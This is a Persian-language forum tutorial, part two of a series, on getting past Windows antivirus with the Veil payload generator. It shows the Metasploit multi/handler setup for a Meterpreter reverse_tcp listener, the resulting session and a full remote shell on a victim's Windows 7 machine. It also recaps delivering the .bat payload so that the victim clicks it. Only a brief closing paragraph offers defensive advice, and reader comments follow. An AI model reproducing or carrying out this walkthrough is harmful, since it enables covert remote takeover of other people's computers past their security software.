در توسینسو تدریس کنید

و

با دانش خود درآمد کسب کنید

دور زدن آنتی ویروس ویندوز با ابزار Veil- بخش دوم

سلام به دوستان عزیز ITPro ای و علاقه‌مندان به مباحث امنیت شبکه. در قسمت پیش ابزاری را بشما معرفی کردیم که بوسیله استفاده از آن میتوانستیم فایروال و آنتی ویروس را دور بزنیم. به منظور آمادگی داشتن برای شروع قسمت دوم در اینجا خلاصه ای از بخش اول را برای شما می آوریم و قسمت دوم را شروع میکنیم:

مروری بر قسمت اول


نرم افزار "Veil" یک تولید کننده payload در ریموت شل است که میتواند بسیاری از برنامه های آنتی ویروس فعلی را دور بزند. این برنامه یک payload استاندارد برای Metasploit تحویل میدهد و از طریق Metasploit مانند یک برنامه بشما این امکان را میدهد تا Payload های مختلفی را بسازید که اکثر آن ها آنتی ویروس ها را دور میزنند.در ادامه نرم افزار veil را نصب و مورد استفاده قرار دادیم؛ در نهایت برنامه Veil شل کد مورد نظر ما را با آپشن هایی که انتخاب کرده بودیم، تولید کرد؛ بر روی فایل اسم گذارده و نسخه .bat را از آن میسازیم. سپس فایل را به سیستم هدف انتقال داده تا کاربر قربانی بر روی آن کلیک کند. کاری که این فایل انجام میدهد این است که یک ارتباط ریموت شل را از طرف سیستم مقصد بسمت سیستم کالی (حمله کننده) برقرار میکند. پیشنهاد میشود قبل از شروع این بخش، حتما قسمت قبل را مطالعه فرمائید:

گرفتن شل از راه دور


پس از اجرای فایل .bat نیاز به یک برنامه شنود داریم تا بتواند ارتباطی را که از سوی سیستم قربانی برقرار میشود، قبول کند. برای ایجاد برنامه کنترل از راه دور، باید از Metasploit استفاده کنیم.

  1. پلت فرم Metasploit را با استفاده از منو و یا محیط ترمینال (mfsconsole) اجرا میکنیم.
  2. حالا طبق فرمان های زیر، برنامه کنترل از راه دور را تنظیم میکنیم:
  3. Msf > use multi/handler
    Msf exploit(handler) > set payload windows/Meterpreter/reverse_tcp
    Payload => windows/Meterpreter/reverse_tcp
    Msf exploit(handler) > set lhost 192.168.198.137
    Lhost => 192.168.198.137
    Msf exploit(handler) > set lport 4000
    Lport => 4000
    Msf exploit(handler) > exploit
    

مطمئن شوید که آدرس IP سیستم کالی و پورت برای برنامه veil را بدرستی وارد کرده اید. ایندو باید دقیقا با داده هایی که از قبل وارد کردیم یکسان باشند.پس از آن با وارد کردن فرمان "exploit" که در بالا مشاهده کردید، Metasploit برنامه کنترل کننده را اجرا کرده و منتظر ارتباط میماند.

[*] Started reverse handler on 192.168.198.137:4000
[*] Starting the payload handler …

حالا نیاز داریم تا قربانی فایل تولید شده را که در بخش قبلا ایجاد و به سیستم مقصد منتقل کردیم، را اجرا کند.

دور زدن آنتی ویروس ویندوز با ابزار Veil- بخش دوم

در سیستمی که پلت فرم آن ویندوز 7 باشد، اگر فایل اجرا شود، بر روی سیستم کالی خود شاهد فرآیند زیر خواهیم بود:

[*] Started reverse handler on 192.168.198.137:4000
[*] Starting the payload handler …
[*] Sending stage (752128 bytes) to 192.168.198.132
[*] Meterpreter session 1 opened (192.168.198.137:4000 -> 192.168.198.132:49209) 
at 2015-04-11 18:55:43  -0400

Meterpreter >  

همانطور که میبینید یک ارتباط شل در جهت عکس (از سیستم قربانی به سیستم حمله کننده) برقرار گردید! حالا اگر عبارت "shell" را تایپ کنیم، خواهیم دید که ما الان یک ریموت شل با اختیارات کامل را در اختیار داریم:

Meterpreter > shell
Process 216 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Ehsan\Desktop >

جمع بندی


این نکته بما آموخت که نمیتوان بطور صد در صد به فایروال و آنتی ویروس به عنوان تنها راه های محافظت از سیستم اکتفاء کرد. متاسفانه در اکثر مواقع امنیت شبکه شما به کاربران و این که چه کارهایی را مجاز به انجام هستند، دارد.به کاربران خود آموزش دهید که هرگز برنامه ها و فایل هایی را که بطور ناخواسته از طریق ایمیل به سیستم وارد شده است را باز نکنند. همچنین جلوگیری از اجرا و ورود و خروج برخی فایل ها با پسوندهای خاص هم میتواند ایده خوبی باشد.در نهایت استفاده از سیستم امنیتی مانیتورینگ شبکه بما کمک میکند تا آن چیزی را که اتفاق می افتد و آن چیزی که امنیت شبکه را بخطر می اندازد را پیگیری و رصد کنیم.

سربلند و مانا باشید.

پایان

نویسنده: احسان امجدی

منبع: انجمن تخصصی فناوری اطلاعات ایران

هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد.

#آموزش_لینوکس_کالی #آموزش_برنامه_veil #آموزش_استفاده_از_metasploit #ریموت_شل_به_ویندوز #چگونه_آنتی_ویروس_را_دور_بزنیم؟ #چگونه_به_ویندوز_نفوذ_کنیم؟ #چگونه_فایروال_را_دور_بزنیم؟ #shell_گرفتن_از_سیستم_هک_شده
عنوان
1 دور زدن آنتی ویروس ویندوز با ابزار Veil- بخش اول رایگان
2 دور زدن آنتی ویروس ویندوز با ابزار Veil- بخش دوم رایگان
زمان و قیمت کل 0″ 0
5 نظر
محمد حسین گلی

جناب امجدی عزیز یه جاشو من نفهمیدم اینکه فایل چه زمانی روی Desktop قربانی کپی شد و چه زمانی اصلا قربانی مشخص شد؟؟؟

احسان امجدی

محمد حسین عزیز بحث کپی کردن فایل از کالی به سیستم هدف و بلعکس در در قسمت های پیش آموزش دادم که متاسفانه به علت حجم بالای مطلب امکان این وجود نداره که در هر آموزش مطالب از قبل اموزش داده شده را مرور کنیم. به همین علت همیشه پیشنهاد کردم و میکنم که آموزش های کالی رو دقیقا از همون قسمت اولش شروع به خوندن کنید. چون تمام قسمت ها مستقیم و غیر مستقیم وابسته به قسمت های پیش هستش. لینک اون قسمت که کپی کردم فایل رو گفتم در زیر برات میذارم:

کار کردن با ماژول ها در سیستم تحت نفوذ – بازیابی فایل های پاک شده در سیستم قربانی

اما در مورد این که سیستم قربانی رو کی مشخص کردیم هم همون علتی داره که در بالا گفتم.... به علت این که در لینک بالا بطور کامل مشخص کردن قربانی و کپی کردن فایل به او و بلعکس آموزش داده شده، با فرض این که خواننده قسمت های پیش رو خونده، در اینجا دیگه اون راه رو نیاورده.

محمد حسین جان اینو من تاکید کنم که در آموزش هایی که میدیم، ردپایی از آموزش های قبلی هم وجود داره و به علت این که اگه بخواهیم در هر آموزش کل مطلب رو بگیم خیلی حجم مطلب بالا میره و تکراریات زیاد میشه، بنابراین هر آموزش با فرض اینه که خواننده کل اموزش های قبلی رو خونده باشه.

ممنون از حسن توجه ات.

محمد حسین گلی

ممنون که با حوصله جواب دادی متاسفانه و یا خوشبختانه چند روزی بیشتر نیست که عضو این انجمن شدم و در خدمت اساتیدی چون شما هستم به خاطر همین از آموزش های قبلی اطلاعی ندارم، ببخشید بنده رو، جا داره مجددا از مطالب خوبتون قدردانی کنم.

احسان امجدی

خواهش میکنم. حالا چرا خوشبختانه ؟؟؟ :)

امیدوارم از مطالب این انجمن حسن استفاده را ببرید.

محمد حسین گلی

متاسفانه به خاطر اینکه خیلی دیر این انجمن رو پیدا کردم. (چند سالی بود تو فکر تشکیل یه همچین انجمنی بودم اما به دلایلی اجرایی شدنش غیر ممکن بود)

و خوشبختانه به خاطر اینکه بالاخره این انجمن رو پیدا کردم و هم اکنون عضوشم.

نظر شما
برای ارسال نظر باید وارد شوید.
از سرتاسر توسینسو
تنظیمات حریم خصوصی
تائید صرفنظر
×

تو می تونی بهترین نتیجه رو تضمینی با بهترین های ایران بدست بیاری ، پس مقایسه کن و بعد خرید کن : فقط توی جشنواره تابستانه می تونی امروز ارزونتر از فردا خرید کنی ....